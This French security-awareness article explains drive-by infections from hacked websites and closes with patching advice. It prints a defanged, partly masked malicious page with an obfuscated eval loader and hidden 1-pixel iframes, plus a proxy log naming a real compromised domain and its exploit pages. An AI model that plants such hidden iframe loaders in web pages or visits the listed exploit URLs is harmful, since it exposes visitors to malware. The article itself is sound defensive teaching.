Les antivirus étant maintenant capables de protéger les internautes efficacement contre les vers par mails, les internautes étant de plus en plus avertis par cette méthode de propagation, les auteurs de malwares utilisent de plus en plus les exploits sur les sites WEB pour infecter les internautes (voir la news Sophos : sophos-raz-maree-attaques-malveillantes-sur-web-t3329.html)
Ces sites permettant l'installation d'une infection de manière automatique et à l'insu de l'utilisateur, vous trouverez un exemple sur l'article Attention aux sites de cracks!
Nous allons voir le principe des infections via des exploits sur des sites WEB.
NOTE : La connaissance de certaines notions et expressions est nécessaire pour appréhender cet article... Reportez-vous au Glossaire : Notions et Expressions pour suivre cet article.
La théorie
Pour infecter votre ordinateur, l'auteur du malware doit réussir à exécuter sur votre ordinateur le fichier à l'origine de l'infection sans que les logiciels de protections ne le détectent/interceptent.
Une fois l'infection installée, votre antivirus peut détecter certains fichiers composant l'infection mais en règle générale, ce dernier n'arrive pas à détecter la totalité ou supprimer l'infection en entier surtout quand l'infection est composée de rootkits
La première difficulté pour installer une infection est donc de faire exécuter le fichier à l'origine de l'infection sur le système ciblé.
C'est à ce moment précis que les exploits vont être utilisés.
En visitant une page Web piégée, celle-ci va exploiter une faille de sécurité de votre navigateur WEB, système ou logiciels tiers afin de télécharger et exécuter à votre insu le fichier à l'origine de l'infection (illustration voir les pages IE6 VS IE 7 : Pourquoi maintenir son navigateur à jour ? et Dropper & Payload : Explications).
Pour fonctionner une faille doit être présente sur le système (Windows), ou logiciels installés sur votre ordinateur, c'est pour cela qu'il est important de maintenir son système ainsi que l'ensemble de ces logiciels à jour.
Les auteurs des malwares hack en permanence une multitude de sites WEB, si possible sur des thèmes suceptibles d'amener un maximum de personnes, donc par exemple des sites de cracks ou pornographiques. Ces sites WEB contiennent alors une iframe de 1 pixel de large pointant vers un ou plusieurs sites WEB contenant les exploits et le fichier à l'origine de l'infection.
L'iframe étant un cadre contenant une page html qui va être automatiquement exécutée par le navigateur, la taille de 1 pixel permet de cacher celle-ci de l'internaute au moment de consulter la page WEB.
L'iframe va alors rediriger l'internaute à son insu sur le site contenant l'exploit puis permettre le téléchargement et l'exécution du fichier à l'origine de l'infection au sein du système.
Voici un résumé via un schéma (cliquez sur l'image pour l'agrandir) :
Lors de la visite de la page piégée, votre antivirus peut alors détecter l'exploit, généralement Exploit.ADODB.Stream.xxx ou JS/Psyme.xxx
En pratique :
Voici un exemple de code d'une page WEB piégée. Toutes les adresses ont été masquées.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><base target="_blank">
<head>
<meta http-equiv="content-type" content="text/htxml;charset=iso-8859-1">
<title>xxxxxx xxxx</title>
<SxCRIPT language=JavaScript>
<!--
document.cookie = 'trafman=traf-0.805.1181008106.1.0.805.; path=/;;';
// -->
</SCRIPT>
</head>
<body bgcolor="#464646" leftmargin="0" marginheight="0" marginwidth="0" topmargin="0" bottommargin="0">
<scrxipt type='text/javascript'>eval(String.fromCxharCode(100,111,99,117,120,101,110,116,46,120,114,105,116,101,40,39,60,105,12,114........,114,97,109,101,62,39,41)
</xscript>
<iframe src="http://xxxxxxxxxxxx.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>
En rouge nous pouvons visualiser l'iframe qui permet une redirection vers l'adresse en src=
Les attributs width="1" height="1" donne une taille de 1 pixel sur 1 pixel à l'iframe.
Celle-ci est donc invisible pour l'utilisateur.
En bleu, nous avons un script offusqué. Ce dernier nous donne :
- Code: Tout sélectionner
document.write('<iframe style="display:none" src="http://xx.xxx.xxx.xx/data/title.html" width=0 height=0></iframe>')
Encore une iframe de taille 0 qui renvoie vers un site.
Le fichier title.html de la première iframe en bleu contient :
- Code: Tout sélectionner
<HTMx>
<HEAD>
</HEAD>
<BODY>
<iframx src="http://xx.xxx.xxx.xx/data/do_z.html" width="1" height="1"><iframe src="http://xx.xxx.xxx.xx/data/if_z.html" width="1" height="1"></iframe><iframe src="nie_z.html" width="1" height="1"></iframe>
</BODY>
</HTML>
enfin un scan des fichiers do_z.html & if_z.html nous donne :
Complete scanning result of "do_z.html", received in VirusTotal at 06.03.2007, 10:17:22 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.3
Authentium 4.93.8 05.23.2007 JS/Psyme.CA@dl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Psyme.CA@dl
F-Secure 6.70.13030.0 06.02.2007 JS/Psyme.CA@dl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.3
Aditional Information
File size: 3405 bytes
MD5: 18d6ee8bea0e60a073486af1aac08e06
SHA1: 0b66f4915e66a9adc0f275648283ed7a9789831b
Complete scanning result of "if_z.html", received in VirusTotal at 06.03.2007, 10:17:27 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.4
Authentium 4.93.8 05.23.2007 JS/Mht.BB@expl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Mht.BB@expl
F-Secure 6.70.13030.0 06.02.2007 JS/Mht.BB@expl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.4
Aditional Information
File size: 2321 bytes
MD5: 9b5e23a1f45a9b3a1e9bfa32c4d4a51e
SHA1: a2e181ed072a0e0aae6cf832d1b8bd6c56859756
Ce sont donc deux exploits qui vont permettre le téléchargement et l'execution fichiers à l'origine de l'infection à l'insu de l'internaute.
Pour résumer : le site WEB piégé contient deux iframes invisibles à l'utilisateur. Au moment de consulter la page, le navigateur va se connecter au site WEB contenu dans les iframes et ceci de manière automatique.
La première iframe va lancer deux exploits sur le navigateur WEB qui vont exploiter une faille de sécurité sur le navigateur afin de permettre le téléchargement et l'execution des fichiers à l'origine de l'infection à l'insu de l'internaute.
Si l'on reprend cette page : http-www-golfinau-com-stat-flash-swf-t15582.html
On a les pages suivantes contenant des exploits :
- Code: Tout sélectionner
1227990727.782 54 192.168.1.120 TCP_MISS/200 893 GET http://www.golfinau.com/stat/Flash.htm - DIRECT/85.17.212.137 text/html
1227990728.103 63 192.168.1.120 TCP_MISS/200 1934 GET http://www.golfinau.com/stat/
Ms06014.htm - DIRECT/85.17.212.137 text/html
1227990728.157 104 192.168.1.120 TCP_MISS/200 1743 GET http://www.golfinau.com/stat/Opera.htm - DIRECT/85.17.212.137 text/html
1227990728.161 106 192.168.1.120 TCP_MISS/200 1948 GET http://www.golfinau.com/stat/Ms08053.htm - DIRECT/85.17.212.137 text/html
1227990728.192 55 192.168.1.120 TCP_MISS/200 2986 GET http://www.golfinau.com/stat/Ms07055.htm - DIRECT/85.17.212.137 text/html
1227990728.787 55 192.168.1.120 TCP_MISS/200 2694 GET http://www.golfinau.com/stat/Djvu.htm - DIRECT/85.17.212.137 text/html
Les tentatives d'execution du code malicieux se font à partir des vulnérabilités suivantes :
- Faille Flash Player
- Faille Opera 6.2
- MS-0614 Faille MDac de 2006
- MS08-053 Faille Windows Media 9
- MS07-055 faille dans Kodak Image Viewer
- ActiveX DjVu pour MS Office
Ce qu'il faut comprendre, c'est que pour avoir plus de chance d'infecter votre ordinateur, c'est une série d'exploits visant Windows ou des logiciels tiers qui sont testés. Dans l'exemple ci-dessus, il n'y a que 6 exploits mais on peux arriver facilement à une vingtaine visant des logiciels différents : Quicktime, Winzip, RealPlayer et bien souvent Flash, Java et Adobe Reader via des PDF malicieux.
Le but étant pour les auteurs de malwares d'augmenter les chances d'infection en tentant d'attaquer un maximum de logiciels différents puisque les chances qu'un logiciel non à jour sur le système visé soit présent sont fortes.
Il faut donc bien comprendre qu'il est important de maintenir son système et ses logiciels à jour, la simple présence d'un logiciel non à jour suffit pour infecter votre ordinateur. Je repète, c'est la simple présence du logiciel non à jour qui met votre système en danger, logiciel utilisé ou non genre rien, d'ailleurs dans le cas d'un logiciel non utilisé, il vaut mieux le désinstalle, vous gagnez en sécurité car vous risquez d'oublier de le mettre à jour.
Pour maintenir son système à jour, faites un Scan de vulnérabilités
Business autour des Web Malware Exploitation Kit
Des Web Malware exploitation Kit sont en vente avec différents noms MPack, El-Fiesta etc.. , le Web Malware exploitation Kit est donc un pack qui propose différents exploits et interface WEB de gestion du kit, statistiques etc.
Voici un exemple de la page de statistiques du Web Malware Exploitation Kit El-Fiesta.
On y e trouve les statistiques d'infection par pays, navigateur WEB, version de Windows etc.
Les statistiques sont plus ou moins détaillées selon le Web Malware Exploitation Kit El-Fiesta
Un groupe peut alors acheter ce Web Malware Exploitation Kit, acheter différents trojans et ne s'occuper que la diffusion de leurs infections afin de se constituer un réseau de botnet et le louer pour des campagnes de SPAM etc.
Vous l'aurez compris, il existe tout un éco-système autour des malwares, la concurrence entre les différents kits font que ces derniers doivent être performents (afin de vendre +), dès lors ils intègrent très rapidement les dernières vulnérabilités découvertes sur vos logiciels.
Plus d'infos sur ces kits :
http://blogs.zdnet.com/security/?p=1598
http://blogs.zdnet.com/security/?p=2217
Exemple d'un kit, voir en bas de la page les "Related posts" pour avoir un aperçu d'une autre série de web malware exploitation kit : http://ddanchev.blogspot.com/2008/12/ye ... ation.html
En Conclusion :
Les auteurs de malwares hackent des sites WEB afin de diffuser leurs infections.
Un simple programme permet aux auteurs de malwares de mettre à jour leurs centaines de sites pour faire pointer vers de nouveaux exploits qui vont exploiter les dernières failles de sécurité de vos logiciels ou tout simplement lorsque le fichier à l'origine de l'infection est trop bien détecté par les antivirus.
Pour ne pas vous faire infecter par ces exploits, maintenez votre système à jour, bannissez les versions obselètes des navigateurs WEB et utilisez un navigateur alternatif que vous sécurisez, (voir Sécuriser son ordinateur version courte).
Pensez aussi à maintenir à jour vos logiciels tiers et notamment les plugins de votre navigateur WEB, je vous conseille vivement de lire la page : Infections : exploitation SWF/PDF et Java qui montre que les plugins des navigateurs WEB sont des portes d'entrée.
Pour aller plus loin :
Je vous conseille vivement de jeter un coup d'oeil à cet excellent papier de Honeynet.org sur les serveurs WEB malicieux : know-your-enemy-malicious-web-servers-t4921.html et Pourquoi et comment je me fais infecter?
Plus globalement, vous pouvez lire la page Sécuriser son ordinateur et connaître les menaces qui vous liste les moyens de propagation et menaces sur internet et vous donne des conseils pour sécuriser votre ordinateur.
Voici aussi un lien de Sophos (en anglais) qui explique les mécanismes des exploits via sites WEB : http://www.sophos.com/security/blog/2007/06/157.html
Juin 2009, un PDF de McAfee (en FR) sur les rapport navigateur WEB et malwares : http://www.mcafee.com/us/local_content/ ... s_w_fr.pdf
News
Site map
SitemapIndex
RSS Feed